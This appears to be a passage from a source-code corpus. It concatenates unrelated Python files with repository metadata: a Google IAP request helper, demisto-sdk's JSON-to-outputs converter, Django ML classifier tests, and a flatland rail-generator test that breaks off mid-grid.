OAUTH_TOKEN_URI = os.environ.get('GCP_OAUTH_TOKEN_URI', 'https://www.googleapis.com/oauth2/v4/token')
def iap_request(url, data=None, headers=None):
if "localhost.newsdev.net" in url:
resp = requests.post(url, headers=headers, data=data)
else:
base_url = urlparse.urlunparse(
urlparse.urlparse(url)._replace(path='', query='', fragment=''))
credentials = service_account.Credentials.from_service_account_file(GCP_SECRETS)
bootstrap_credentials = credentials.with_scopes([IAM_SCOPE])
if isinstance(bootstrap_credentials, google.oauth2.credentials.Credentials):
raise Exception('make_iap_request is only supported for service accounts.')
bootstrap_credentials.refresh(Request())
signer_email = bootstrap_credentials.service_account_email
if isinstance(bootstrap_credentials, google.auth.compute_engine.credentials.Credentials):
signer = google.auth.iam.Signer(Request(), bootstrap_credentials, signer_email)
else:
signer = bootstrap_credentials.signer
service_account_credentials = google.oauth2.service_account.Credentials(
signer, signer_email, token_uri=OAUTH_TOKEN_URI, additional_claims={
'target_audience': base_url
})
google_open_id_connect_token = get_google_open_id_connect_token(service_account_credentials)
# Append our header to a list of possible headers.
if not headers:
headers = {'Authorization': 'Bearer {}'.format(google_open_id_connect_token)}
else:
headers['Authorization'] = 'Bearer {}'.format(google_open_id_connect_token)
resp = requests.post(url, headers=headers, data=data)
if resp.status_code == 403:
raise Exception('Service account {} does not have permission to '
'access the IAP-protected application.'.format(
signer_email))
if resp.status_code != 200:
return resp.text
return resp.text
def get_google_open_id_connect_token(service_account_credentials):
service_account_jwt = (service_account_credentials._make_authorization_grant_assertion())
request = google.auth.transport.requests.Request()
body = {
'assertion': service_account_jwt,
'grant_type': google.oauth2._client._JWT_GRANT_TYPE,
}
token_response = google.oauth2._client._token_endpoint_request(request, OAUTH_TOKEN_URI, body)
return token_response['id_token']
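# Illustrative usage sketch (not part of the original module): POST to an
# IAP-protected endpoint. The URL and payload are placeholders, and the call
# assumes GCP_SERVICE_WORKER_CREDS points at a valid service-account key file.
def _example_iap_request():
    return iap_request('https://internal.example.com/api/ping', data={'ping': '1'})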
| 40.025641
| 101
| 0.722293
|
e22f915f4ca9e7b33c267c82b93101d8a5c78309
| 176
|
py
|
Python
|
Inversor.py
|
fedegy/ipc1E_corto3
|
807807d78960a9cc1a2a1d06c5143af15bbf20f2
|
[
"Apache-2.0"
] | null | null | null |
Inversor.py
|
fedegy/ipc1E_corto3
|
807807d78960a9cc1a2a1d06c5143af15bbf20f2
|
[
"Apache-2.0"
] | null | null | null |
Inversor.py
|
fedegy/ipc1E_corto3
|
807807d78960a9cc1a2a1d06c5143af15bbf20f2
|
[
"Apache-2.0"
] | null | null | null |
class Inversor:
    def __init__(self, resultado):
        self.resultado = resultado
    def dump(self):
        return {
            'resultado': self.resultado
}
| 17.6
| 40
| 0.556818
|
87109cc1d6b8b1e135fac77709389fd427b1590d
| 8,301
|
py
|
Python
|
demisto_sdk/commands/json_to_outputs/json_to_outputs.py
|
sturmianseq/demisto-sdk
|
67ce7ee70ccd557d661e03a60469301c5cbcb9c0
|
[
"MIT"
] | null | null | null |
demisto_sdk/commands/json_to_outputs/json_to_outputs.py
|
sturmianseq/demisto-sdk
|
67ce7ee70ccd557d661e03a60469301c5cbcb9c0
|
[
"MIT"
] | null | null | null |
demisto_sdk/commands/json_to_outputs/json_to_outputs.py
|
sturmianseq/demisto-sdk
|
67ce7ee70ccd557d661e03a60469301c5cbcb9c0
|
[
"MIT"
] | null | null | null |
"""
This script parses a raw API response (JSON) into a yml-formatted file with the context path of each field.
For example:
{
"id":12131,
"description":"desc",
"summary":"do-not-delete",
"created":"2019-03-25T16:13:13.188+0200",
"issuetype":{
"id":10004,
"name":"Bug"
},
"project":{
"id":10001,
"key":"SOC",
"projectTypeKey":"software"
},
"status":{
"id":10003,
"StatusCategory":{
"key":"new",
"colorName":"blue-gray",
"name":"To Do"
}
}
}
==>
arguments: []
name: integration-command
outputs:
- contextPath: Demisto.Id
description: ''
type: Number
- contextPath: Demisto.Description
description: ''
type: String
- contextPath: Demisto.Summary
description: ''
type: String
- contextPath: Demisto.Created
description: ''
type: String
- contextPath: Demisto.Issuetype.Id
description: ''
type: Number
- contextPath: Demisto.Issuetype.Name
description: ''
type: String
- contextPath: Demisto.Project.Id
description: ''
type: Number
- contextPath: Demisto.Project.Key
description: ''
type: String
- contextPath: Demisto.Project.ProjectTypeKey
description: ''
type: String
- contextPath: Demisto.Status.Id
description: ''
type: Number
- contextPath: Demisto.Status.StatusCategory.Key
description: ''
type: String
- contextPath: Demisto.Status.StatusCategory.Colorname
description: ''
type: String
- contextPath: Demisto.Status.StatusCategory.Name
description: ''
type: String
"""
import json
import os
import sys
from typing import Dict, Optional
import dateparser
import yaml
from demisto_sdk.commands.common.tools import (LOG_COLORS, print_color,
print_error)
def input_multiline():
sentinel = '' # ends when this string is seen
return '\n'.join(iter(input, sentinel))
def flatten_json(nested_json, camelize=False):
out = {}
def flatten(x, name=''):
# capitalize first letter in each key
try:
name = name[0].upper() + name[1:] if camelize else name
except IndexError:
name = name.title() if camelize else name
if isinstance(x, dict):
for a in x:
flatten(x[a], name + a + '.')
elif isinstance(x, list):
for a in x:
flatten(a, name[:-1] + '.')
else:
out[name.rstrip('.')] = x
flatten(nested_json)
return out
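# Illustrative example (not part of the original module): nested keys are joined
# with dots; list elements collapse onto the parent key, so the last one wins.
def _example_flatten_json():
    flat = flatten_json({'project': {'id': 10001, 'key': 'SOC'}})
    assert flat == {'project.id': 10001, 'project.key': 'SOC'}
    return flat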
def jsonise(context_key, value, description=''):
return {
'contextPath': context_key,
'description': description,
'type': determine_type(value)
}
def is_date(val):
"""
Determines if val is Date, if yes returns True otherwise False
"""
if isinstance(val, (int, float)) and val > 15737548065 and val < 2573754806500:
        # 15737548065 is roughly the lowest plausible timestamp (the epoch starts in 1970)
        # 2573754806500 is around the year 2050 - no JSON should contain a datetime beyond that
        # if the number falls between these two values, it is probably a timestamp, i.e. a date
return True
if isinstance(val, str) and len(val) >= 10 and len(val) <= 30 and dateparser.parse(val):
        # the shortest date string is len('2019-10-10') = 10
        # the longest date string considered is at most 30 characters, e.g. '2019-10-10T00:00:00.000 +0900'
        # the length check keeps calls to the relatively expensive dateparser.parse to a minimum
return True
return False
def determine_type(val):
if is_date(val):
return 'Date'
if isinstance(val, str):
return 'String'
# bool is an sub class of int, so the we should first check isinstance of bool and only afterwards int
if isinstance(val, bool):
return 'Boolean'
if isinstance(val, (int, float)):
return 'Number'
return 'Unknown'
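# Illustrative examples (not part of the original module), using values from the
# sample payload in the module docstring; the Date case assumes dateparser can
# parse that timestamp format.
def _example_determine_type():
    assert determine_type('2019-03-25T16:13:13.188+0200') == 'Date'
    assert determine_type('do-not-delete') == 'String'
    assert determine_type(True) == 'Boolean'
    assert determine_type(12131) == 'Number'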
def parse_json(data, command_name, prefix, verbose=False, interactive=False, descriptions: Optional[Dict] = None):
if data == '':
raise ValueError('Invalid input JSON - got empty string')
try:
data = json.loads(data)
except ValueError as ex:
if verbose:
print_error(str(ex))
raise ValueError('Invalid input JSON')
# If data is a list of dictionaries [{'a': 'b', 'c': 'd'}, {'e': 'f'}] -> {'a': 'b', 'c': 'd', 'e': 'f'}.
# In case there are two identical keys (in two different dictionaries) with values of different types,
# the type will be determined by the last dictionary [{'a': 'b'}, {'a': 1}] -> {'a': 1} -> type of 'a' = Number.
if isinstance(data, list):
data = {k: v for d in data for k, v in d.items()}
flattened_data = flatten_json(data)
if prefix:
flattened_data = {f'{prefix}.{key}': value for key, value in flattened_data.items()}
if descriptions:
descriptions = {f'{prefix}.{key}': value for key, value in descriptions.items()}
arg_json = []
for key, value in flattened_data.items():
description = ''
if descriptions and key in descriptions:
description = descriptions[key]
elif interactive:
print(f'Enter description for: [{key}]')
description = input_multiline()
arg_json.append(jsonise(key, value, description))
if verbose:
print(f'JSON before converting to YAML: {arg_json}')
yaml_output = yaml.safe_dump(
{
'name': command_name.lstrip('!'),
'arguments': [],
'outputs': arg_json
},
default_flow_style=False
)
return yaml_output
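# Illustrative usage (not part of the original module): convert a small raw API
# response into command outputs YAML. The command name and prefix are made up.
def _example_parse_json():
    raw = '{"id": 12131, "issuetype": {"name": "Bug"}}'
    return parse_json(raw, command_name='jira-get-issue', prefix='Ticket')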
def json_to_outputs(command, input, prefix, output=None, verbose=False, interactive=False, descriptions=None):
"""
This script parses JSON to Demisto Outputs YAML format
Args:
        command: the name of the command that this output belongs to, e.g. xdr-get-incidents
input: full path to valid JSON file - the JSON file should contain API response from the service
prefix: The prefix of the context, this prefix will appear for each output field - VirusTotal.IP,
CortexXDR.Incident
output: Full path to output file where to save the YAML
        verbose: This is used for debugging purposes - more logs
        interactive: by default all the output descriptions are empty, but if the user sets this to True then the script
            will ask for user input for each description
descriptions: JSON or path to JSON file mapping field names to their context descriptions. (Optional)
Returns:
"""
try:
if input:
with open(input, 'r') as json_file:
input_json = json_file.read()
else:
print("Enter the command's output in JSON format.\n "
"As an example, If one of the command's output is `item_id`,\n enter {\"item_id\": 1234}")
input_json = input_multiline()
descriptions = _parse_description_argument(descriptions)
yaml_output = parse_json(input_json, command, prefix, verbose, interactive, descriptions)
if output:
with open(output, 'w') as yf:
yf.write(yaml_output)
print_color(f'Outputs file was saved to :\n{output}', LOG_COLORS.GREEN)
else:
print_color("YAML Outputs\n\n", LOG_COLORS.GREEN)
print(yaml_output)
except Exception as ex:
if verbose:
raise
else:
print_error(f'Error: {str(ex)}')
sys.exit(1)
def _parse_description_argument(descriptions: Optional[str]) -> Optional[dict]: # type: ignore
"""Parses the descriptions argument, be it a path to JSON or a JSON body given as argument """
if not descriptions: # None or empty
return None
try:
if os.path.exists(descriptions): # file input
with open(descriptions, encoding='utf8') as f:
return json.load(f)
else:
parsed = json.loads(descriptions) # argument input
if not isinstance(parsed, Dict):
raise TypeError("Expected a dictionary")
return parsed
except (json.JSONDecodeError, TypeError):
print("Error decoding JSON descriptions, ignoring them.")
| 30.630996
| 116
| 0.617757
|
8672385d04f6b7cd04f12ee5b7a183f75c529b22
| 226
|
py
|
Python
|
slack_bot_manager/urls.py
|
devights/coffeebot
|
ade8ed3c7fc77eaaed049b7f290d8afca318593a
|
[
"Apache-2.0"
] | null | null | null |
slack_bot_manager/urls.py
|
devights/coffeebot
|
ade8ed3c7fc77eaaed049b7f290d8afca318593a
|
[
"Apache-2.0"
] | null | null | null |
slack_bot_manager/urls.py
|
devights/coffeebot
|
ade8ed3c7fc77eaaed049b7f290d8afca318593a
|
[
"Apache-2.0"
] | null | null | null |
from django.conf.urls import patterns, include, url
from django.contrib import admin
urlpatterns = patterns('',
url(r'^$', 'bot_manager.views.home.home', name='home'),
url(r'^botmgr/', include('bot_manager.urls')),
)
| 28.25
| 59
| 0.69469
|
2fb6d7c687adfd33f3cc091b69cc218d8efcffdd
| 2,697
|
py
|
Python
|
backend/server/apps/ml/tests.py
|
pratsingh/ML_Django_Project
|
c39266601ae86c3c708ccb566872beea3bff37bc
|
[
"MIT"
] | null | null | null |
backend/server/apps/ml/tests.py
|
pratsingh/ML_Django_Project
|
c39266601ae86c3c708ccb566872beea3bff37bc
|
[
"MIT"
] | null | null | null |
backend/server/apps/ml/tests.py
|
pratsingh/ML_Django_Project
|
c39266601ae86c3c708ccb566872beea3bff37bc
|
[
"MIT"
] | null | null | null |
import inspect
from apps.ml.registry import MLRegistry
from django.test import TestCase
from apps.ml.income_classifier.extra_trees import ExtraTreesClassifier
from apps.ml.income_classifier.random_forest import RandomForestClassifier
class MLTests(TestCase):
def test_rf_algorithm(self):
input_data = {
"age": 37,
"workclass": "Private",
"fnlwgt": 34146,
"education": "HS-grad",
"education-num": 9,
"marital-status": "Married-civ-spouse",
"occupation": "Craft-repair",
"relationship": "Husband",
"race": "White",
"sex": "Male",
"capital-gain": 0,
"capital-loss": 0,
"hours-per-week": 68,
"native-country": "United-States"
}
my_alg = RandomForestClassifier()
response = my_alg.compute_prediction(input_data)
self.assertEqual('OK', response['status'])
self.assertTrue('label' in response)
self.assertEqual('<=50K', response['label'])
def test_registry(self):
registry = MLRegistry()
self.assertEqual(len(registry.endpoints), 0)
endpoint_name = "income_classifier"
algorithm_object = RandomForestClassifier()
algorithm_name = "random forest"
algorithm_status = "production"
algorithm_version = "0.0.1"
algorithm_owner = "usr"
algorithm_description = "Random Forest with simple pre- and post-processing"
algorithm_code = inspect.getsource(RandomForestClassifier)
# add to registry
registry.add_algorithm(endpoint_name, algorithm_object, algorithm_name,
algorithm_status, algorithm_version, algorithm_owner,
algorithm_description, algorithm_code)
# one endpoint
self.assertEqual(len(registry.endpoints), 1)
def test_et_algorithm(self):
input_data = {
"age": 37,
"workclass": "Private",
"fnlwgt": 34146,
"education": "HS-grad",
"education-num": 9,
"marital-status": "Married-civ-spouse",
"occupation": "Craft-repair",
"relationship": "Husband",
"race": "White",
"sex": "Male",
"capital-gain": 0,
"capital-loss": 0,
"hours-per-week": 68,
"native-country": "United-States"
}
my_alg = ExtraTreesClassifier()
response = my_alg.compute_prediction(input_data)
self.assertEqual('OK', response['status'])
self.assertTrue('label' in response)
self.assertEqual('<=50K', response['label'])
| 37.458333
| 84
| 0.58769
|
ec267c9ac48e8262579e34b26bd200b8b5d663e9
| 305
|
py
|
Python
|
2016/01/unemployment-20160108/graphic_config.py
|
nprapps/graphics-archive
|
97b0ef326b46a959df930f5522d325e537f7a655
|
[
"FSFAP"
] | 14
|
2015-05-08T13:41:51.000Z
|
2021-02-24T12:34:55.000Z
|
2016/01/unemployment-20160108/graphic_config.py
|
nprapps/graphics-archive
|
97b0ef326b46a959df930f5522d325e537f7a655
|
[
"FSFAP"
] | null | null | null |
2016/01/unemployment-20160108/graphic_config.py
|
nprapps/graphics-archive
|
97b0ef326b46a959df930f5522d325e537f7a655
|
[
"FSFAP"
] | 7
|
2015-04-04T04:45:54.000Z
|
2021-02-18T11:12:48.000Z
|
#!/usr/bin/env python
import base_filters
COPY_GOOGLE_DOC_KEY = '1mCqs8ehZe64_muXgzaoRQcexPhTNkKqAL1tXsIUmjBY'
USE_ASSETS = False
# Use these variables to override the default cache timeouts for this graphic
# DEFAULT_MAX_AGE = 20
# ASSETS_MAX_AGE = 300
JINJA_FILTER_FUNCTIONS = base_filters.FILTERS
| 21.785714
| 77
| 0.819672
|
ad2fc43105f494b003ef1317125835a98f1b89f1
| 81,140
|
py
|
Python
|
tests/test_flatland_envs_sparse_rail_generator.py
|
null-pi/flatland-challenge
|
babc6895551f96da1c1b6bea6953db498cfa8644
|
[
"MIT"
] | null | null | null |
tests/test_flatland_envs_sparse_rail_generator.py
|
null-pi/flatland-challenge
|
babc6895551f96da1c1b6bea6953db498cfa8644
|
[
"MIT"
] | 1
|
2020-09-04T13:57:01.000Z
|
2020-09-09T19:21:33.000Z
|
tests/test_flatland_envs_sparse_rail_generator.py
|
null-pi/flatland-challenge
|
babc6895551f96da1c1b6bea6953db498cfa8644
|
[
"MIT"
] | null | null | null |
import unittest
import warnings
import numpy as np
from flatland.core.grid.grid_utils import Vec2dOperations as Vec2d
from flatland.envs.observations import GlobalObsForRailEnv
from flatland.envs.rail_env import RailEnv
from flatland.envs.rail_generators import sparse_rail_generator
from flatland.envs.schedule_generators import sparse_schedule_generator
from flatland.utils.rendertools import RenderTool
def test_sparse_rail_generator():
env = RailEnv(width=50, height=50, rail_generator=sparse_rail_generator(max_num_cities=10,
max_rails_between_cities=3,
seed=5,
grid_mode=False
),
schedule_generator=sparse_schedule_generator(), number_of_agents=10,
obs_builder_object=GlobalObsForRailEnv())
env.reset(False, False, True)
for r in range(env.height):
for c in range(env.width):
if env.rail.grid[r][c] > 0:
print("expected_grid_map[{}][{}] = {}".format(r, c, env.rail.grid[r][c]))
expected_grid_map = np.zeros((50, 50), dtype=env.rail.transitions.get_type())
expected_grid_map[0][6] = 16386
expected_grid_map[0][7] = 1025
expected_grid_map[0][8] = 1025
expected_grid_map[0][9] = 1025
expected_grid_map[0][10] = 1025
expected_grid_map[0][11] = 1025
expected_grid_map[0][12] = 1025
expected_grid_map[0][13] = 17411
expected_grid_map[0][14] = 1025
expected_grid_map[0][15] = 1025
expected_grid_map[0][16] = 1025
expected_grid_map[0][17] = 1025
expected_grid_map[0][18] = 5633
expected_grid_map[0][19] = 5633
expected_grid_map[0][20] = 20994
expected_grid_map[0][21] = 1025
expected_grid_map[0][22] = 1025
expected_grid_map[0][23] = 1025
expected_grid_map[0][24] = 1025
expected_grid_map[0][25] = 1025
expected_grid_map[0][26] = 1025
expected_grid_map[0][27] = 1025
expected_grid_map[0][28] = 1025
expected_grid_map[0][29] = 1025
expected_grid_map[0][30] = 1025
expected_grid_map[0][31] = 1025
expected_grid_map[0][32] = 1025
expected_grid_map[0][33] = 1025
expected_grid_map[0][34] = 1025
expected_grid_map[0][35] = 1025
expected_grid_map[0][36] = 1025
expected_grid_map[0][37] = 1025
expected_grid_map[0][38] = 1025
expected_grid_map[0][39] = 4608
expected_grid_map[1][6] = 32800
expected_grid_map[1][7] = 16386
expected_grid_map[1][8] = 1025
expected_grid_map[1][9] = 1025
expected_grid_map[1][10] = 1025
expected_grid_map[1][11] = 1025
expected_grid_map[1][12] = 1025
expected_grid_map[1][13] = 34864
expected_grid_map[1][18] = 32800
expected_grid_map[1][19] = 32800
expected_grid_map[1][20] = 32800
expected_grid_map[1][39] = 32800
expected_grid_map[2][6] = 32800
expected_grid_map[2][7] = 32800
expected_grid_map[2][8] = 16386
expected_grid_map[2][9] = 1025
expected_grid_map[2][10] = 1025
expected_grid_map[2][11] = 1025
expected_grid_map[2][12] = 1025
expected_grid_map[2][13] = 2064
expected_grid_map[2][18] = 32872
expected_grid_map[2][19] = 37408
expected_grid_map[2][20] = 32800
expected_grid_map[2][39] = 32872
expected_grid_map[2][40] = 4608
expected_grid_map[3][6] = 32800
expected_grid_map[3][7] = 32800
expected_grid_map[3][8] = 32800
expected_grid_map[3][18] = 49186
expected_grid_map[3][19] = 34864
expected_grid_map[3][20] = 32800
expected_grid_map[3][39] = 49186
expected_grid_map[3][40] = 34864
expected_grid_map[4][6] = 32800
expected_grid_map[4][7] = 32800
expected_grid_map[4][8] = 32800
expected_grid_map[4][18] = 32800
expected_grid_map[4][19] = 32872
expected_grid_map[4][20] = 37408
expected_grid_map[4][38] = 16386
expected_grid_map[4][39] = 34864
expected_grid_map[4][40] = 32872
expected_grid_map[4][41] = 4608
expected_grid_map[5][6] = 49186
expected_grid_map[5][7] = 3089
expected_grid_map[5][8] = 3089
expected_grid_map[5][9] = 1025
expected_grid_map[5][10] = 1025
expected_grid_map[5][11] = 1025
expected_grid_map[5][12] = 1025
expected_grid_map[5][13] = 4608
expected_grid_map[5][18] = 32800
expected_grid_map[5][19] = 32800
expected_grid_map[5][20] = 32800
expected_grid_map[5][38] = 32800
expected_grid_map[5][39] = 32800
expected_grid_map[5][40] = 32800
expected_grid_map[5][41] = 32800
expected_grid_map[6][6] = 32800
expected_grid_map[6][13] = 32800
expected_grid_map[6][18] = 32800
expected_grid_map[6][19] = 49186
expected_grid_map[6][20] = 34864
expected_grid_map[6][38] = 72
expected_grid_map[6][39] = 37408
expected_grid_map[6][40] = 49186
expected_grid_map[6][41] = 2064
expected_grid_map[7][6] = 32800
expected_grid_map[7][13] = 32800
expected_grid_map[7][18] = 32872
expected_grid_map[7][19] = 37408
expected_grid_map[7][20] = 32800
expected_grid_map[7][39] = 32872
expected_grid_map[7][40] = 37408
expected_grid_map[8][5] = 16386
expected_grid_map[8][6] = 34864
expected_grid_map[8][13] = 32800
expected_grid_map[8][18] = 49186
expected_grid_map[8][19] = 34864
expected_grid_map[8][20] = 32800
expected_grid_map[8][39] = 49186
expected_grid_map[8][40] = 2064
expected_grid_map[9][5] = 32800
expected_grid_map[9][6] = 32872
expected_grid_map[9][7] = 4608
expected_grid_map[9][13] = 32800
expected_grid_map[9][18] = 32800
expected_grid_map[9][19] = 32800
expected_grid_map[9][20] = 32800
expected_grid_map[9][39] = 32800
expected_grid_map[10][5] = 32800
expected_grid_map[10][6] = 32800
expected_grid_map[10][7] = 32800
expected_grid_map[10][13] = 72
expected_grid_map[10][14] = 1025
expected_grid_map[10][15] = 1025
expected_grid_map[10][16] = 1025
expected_grid_map[10][17] = 1025
expected_grid_map[10][18] = 34864
expected_grid_map[10][19] = 32800
expected_grid_map[10][20] = 32800
expected_grid_map[10][37] = 16386
expected_grid_map[10][38] = 1025
expected_grid_map[10][39] = 34864
expected_grid_map[11][5] = 32800
expected_grid_map[11][6] = 49186
expected_grid_map[11][7] = 2064
expected_grid_map[11][18] = 49186
expected_grid_map[11][19] = 3089
expected_grid_map[11][20] = 2064
expected_grid_map[11][32] = 16386
expected_grid_map[11][33] = 1025
expected_grid_map[11][34] = 1025
expected_grid_map[11][35] = 1025
expected_grid_map[11][36] = 1025
expected_grid_map[11][37] = 38505
expected_grid_map[11][38] = 1025
expected_grid_map[11][39] = 2064
expected_grid_map[12][5] = 72
expected_grid_map[12][6] = 37408
expected_grid_map[12][18] = 32800
expected_grid_map[12][32] = 32800
expected_grid_map[12][37] = 32800
expected_grid_map[13][6] = 32800
expected_grid_map[13][18] = 32800
expected_grid_map[13][32] = 32800
expected_grid_map[13][37] = 32872
expected_grid_map[13][38] = 4608
expected_grid_map[14][6] = 32800
expected_grid_map[14][18] = 32800
expected_grid_map[14][32] = 32800
expected_grid_map[14][37] = 49186
expected_grid_map[14][38] = 34864
expected_grid_map[15][6] = 32872
expected_grid_map[15][7] = 1025
expected_grid_map[15][8] = 1025
expected_grid_map[15][9] = 5633
expected_grid_map[15][10] = 4608
expected_grid_map[15][18] = 32800
expected_grid_map[15][22] = 16386
expected_grid_map[15][23] = 1025
expected_grid_map[15][24] = 4608
expected_grid_map[15][32] = 32800
expected_grid_map[15][36] = 16386
expected_grid_map[15][37] = 34864
expected_grid_map[15][38] = 32872
expected_grid_map[15][39] = 4608
expected_grid_map[16][6] = 72
expected_grid_map[16][7] = 1025
expected_grid_map[16][8] = 1025
expected_grid_map[16][9] = 37408
expected_grid_map[16][10] = 49186
expected_grid_map[16][11] = 1025
expected_grid_map[16][12] = 1025
expected_grid_map[16][13] = 1025
expected_grid_map[16][14] = 1025
expected_grid_map[16][15] = 1025
expected_grid_map[16][16] = 1025
expected_grid_map[16][17] = 1025
expected_grid_map[16][18] = 1097
expected_grid_map[16][19] = 1025
expected_grid_map[16][20] = 5633
expected_grid_map[16][21] = 17411
expected_grid_map[16][22] = 3089
expected_grid_map[16][23] = 1025
expected_grid_map[16][24] = 1097
expected_grid_map[16][25] = 5633
expected_grid_map[16][26] = 17411
expected_grid_map[16][27] = 1025
expected_grid_map[16][28] = 5633
expected_grid_map[16][29] = 1025
expected_grid_map[16][30] = 1025
expected_grid_map[16][31] = 1025
expected_grid_map[16][32] = 2064
expected_grid_map[16][36] = 32800
expected_grid_map[16][37] = 32800
expected_grid_map[16][38] = 32800
expected_grid_map[16][39] = 32800
expected_grid_map[17][9] = 32800
expected_grid_map[17][10] = 32800
expected_grid_map[17][20] = 72
expected_grid_map[17][21] = 3089
expected_grid_map[17][22] = 5633
expected_grid_map[17][23] = 1025
expected_grid_map[17][24] = 17411
expected_grid_map[17][25] = 1097
expected_grid_map[17][26] = 2064
expected_grid_map[17][28] = 32800
expected_grid_map[17][36] = 72
expected_grid_map[17][37] = 37408
expected_grid_map[17][38] = 49186
expected_grid_map[17][39] = 2064
expected_grid_map[18][9] = 32872
expected_grid_map[18][10] = 37408
expected_grid_map[18][22] = 72
expected_grid_map[18][23] = 1025
expected_grid_map[18][24] = 2064
expected_grid_map[18][28] = 32800
expected_grid_map[18][37] = 32872
expected_grid_map[18][38] = 37408
expected_grid_map[19][9] = 49186
expected_grid_map[19][10] = 34864
expected_grid_map[19][28] = 32800
expected_grid_map[19][37] = 49186
expected_grid_map[19][38] = 2064
expected_grid_map[20][9] = 32800
expected_grid_map[20][10] = 32800
expected_grid_map[20][28] = 32800
expected_grid_map[20][37] = 32800
expected_grid_map[21][9] = 32800
expected_grid_map[21][10] = 32800
expected_grid_map[21][26] = 16386
expected_grid_map[21][27] = 17411
expected_grid_map[21][28] = 2064
expected_grid_map[21][37] = 32872
expected_grid_map[21][38] = 4608
expected_grid_map[22][9] = 32800
expected_grid_map[22][10] = 32800
expected_grid_map[22][26] = 32800
expected_grid_map[22][27] = 32800
expected_grid_map[22][37] = 32800
expected_grid_map[22][38] = 32800
expected_grid_map[23][9] = 32872
expected_grid_map[23][10] = 37408
expected_grid_map[23][26] = 32800
expected_grid_map[23][27] = 32800
expected_grid_map[23][37] = 32800
expected_grid_map[23][38] = 32800
expected_grid_map[24][9] = 49186
expected_grid_map[24][10] = 34864
expected_grid_map[24][26] = 32800
expected_grid_map[24][27] = 32800
expected_grid_map[24][37] = 32800
expected_grid_map[24][38] = 32800
expected_grid_map[25][9] = 32800
expected_grid_map[25][10] = 32800
expected_grid_map[25][24] = 16386
expected_grid_map[25][25] = 1025
expected_grid_map[25][26] = 2064
expected_grid_map[25][27] = 32800
expected_grid_map[25][37] = 32800
expected_grid_map[25][38] = 32800
expected_grid_map[26][6] = 16386
expected_grid_map[26][7] = 17411
expected_grid_map[26][8] = 1025
expected_grid_map[26][9] = 34864
expected_grid_map[26][10] = 32800
expected_grid_map[26][23] = 16386
expected_grid_map[26][24] = 33825
expected_grid_map[26][25] = 1025
expected_grid_map[26][26] = 1025
expected_grid_map[26][27] = 2064
expected_grid_map[26][37] = 32800
expected_grid_map[26][38] = 32800
expected_grid_map[27][6] = 32800
expected_grid_map[27][7] = 32800
expected_grid_map[27][8] = 16386
expected_grid_map[27][9] = 33825
expected_grid_map[27][10] = 2064
expected_grid_map[27][23] = 32800
expected_grid_map[27][24] = 32800
expected_grid_map[27][37] = 32800
expected_grid_map[27][38] = 32800
expected_grid_map[28][6] = 32800
expected_grid_map[28][7] = 32800
expected_grid_map[28][8] = 32800
expected_grid_map[28][9] = 32800
expected_grid_map[28][23] = 32872
expected_grid_map[28][24] = 37408
expected_grid_map[28][37] = 32800
expected_grid_map[28][38] = 32800
expected_grid_map[29][6] = 32800
expected_grid_map[29][7] = 32800
expected_grid_map[29][8] = 32800
expected_grid_map[29][9] = 32800
expected_grid_map[29][23] = 49186
expected_grid_map[29][24] = 34864
expected_grid_map[29][37] = 32800
expected_grid_map[29][38] = 32800
expected_grid_map[30][6] = 32800
expected_grid_map[30][7] = 32800
expected_grid_map[30][8] = 32800
expected_grid_map[30][9] = 32800
expected_grid_map[30][22] = 16386
expected_grid_map[30][23] = 34864
expected_grid_map[30][24] = 32872
expected_grid_map[30][25] = 4608
expected_grid_map[30][37] = 32800
expected_grid_map[30][38] = 72
expected_grid_map[30][39] = 1025
expected_grid_map[30][40] = 1025
expected_grid_map[30][41] = 1025
expected_grid_map[30][42] = 1025
expected_grid_map[30][43] = 1025
expected_grid_map[30][44] = 1025
expected_grid_map[30][45] = 1025
expected_grid_map[30][46] = 1025
expected_grid_map[30][47] = 1025
expected_grid_map[30][48] = 4608
expected_grid_map[31][6] = 32800
expected_grid_map[31][7] = 32800
expected_grid_map[31][8] = 32800
expected_grid_map[31][9] = 32800
expected_grid_map[31][22] = 32800
expected_grid_map[31][23] = 32800
expected_grid_map[31][24] = 32800
expected_grid_map[31][25] = 32800
expected_grid_map[31][37] = 32872
expected_grid_map[31][38] = 1025
expected_grid_map[31][39] = 1025
expected_grid_map[31][40] = 1025
expected_grid_map[31][41] = 1025
expected_grid_map[31][42] = 1025
expected_grid_map[31][43] = 1025
expected_grid_map[31][44] = 1025
expected_grid_map[31][45] = 1025
expected_grid_map[31][46] = 1025
expected_grid_map[31][47] = 1025
expected_grid_map[31][48] = 37408
expected_grid_map[32][6] = 32800
expected_grid_map[32][7] = 32800
expected_grid_map[32][8] = 32800
expected_grid_map[32][9] = 32800
expected_grid_map[32][22] = 72
expected_grid_map[32][23] = 37408
expected_grid_map[32][24] = 49186
expected_grid_map[32][25] = 2064
expected_grid_map[32][37] = 72
expected_grid_map[32][38] = 4608
expected_grid_map[32][48] = 32800
expected_grid_map[33][6] = 32800
expected_grid_map[33][7] = 32800
expected_grid_map[33][8] = 32800
expected_grid_map[33][9] = 32800
expected_grid_map[33][23] = 32872
expected_grid_map[33][24] = 37408
expected_grid_map[33][38] = 32800
expected_grid_map[33][48] = 32800
expected_grid_map[34][6] = 32800
expected_grid_map[34][7] = 49186
expected_grid_map[34][8] = 3089
expected_grid_map[34][9] = 2064
expected_grid_map[34][23] = 49186
expected_grid_map[34][24] = 34864
expected_grid_map[34][38] = 32800
expected_grid_map[34][48] = 32800
expected_grid_map[35][6] = 32800
expected_grid_map[35][7] = 32800
expected_grid_map[35][23] = 32800
expected_grid_map[35][24] = 32800
expected_grid_map[35][38] = 32800
expected_grid_map[35][48] = 32800
expected_grid_map[36][6] = 32872
expected_grid_map[36][7] = 37408
expected_grid_map[36][22] = 16386
expected_grid_map[36][23] = 38505
expected_grid_map[36][24] = 33825
expected_grid_map[36][25] = 1025
expected_grid_map[36][26] = 1025
expected_grid_map[36][27] = 1025
expected_grid_map[36][28] = 1025
expected_grid_map[36][29] = 1025
expected_grid_map[36][30] = 4608
expected_grid_map[36][31] = 16386
expected_grid_map[36][32] = 1025
expected_grid_map[36][33] = 1025
expected_grid_map[36][34] = 1025
expected_grid_map[36][35] = 1025
expected_grid_map[36][36] = 1025
expected_grid_map[36][37] = 1025
expected_grid_map[36][38] = 1097
expected_grid_map[36][39] = 1025
expected_grid_map[36][40] = 5633
expected_grid_map[36][41] = 17411
expected_grid_map[36][42] = 1025
expected_grid_map[36][43] = 1025
expected_grid_map[36][44] = 1025
expected_grid_map[36][45] = 5633
expected_grid_map[36][46] = 17411
expected_grid_map[36][47] = 1025
expected_grid_map[36][48] = 34864
expected_grid_map[37][6] = 49186
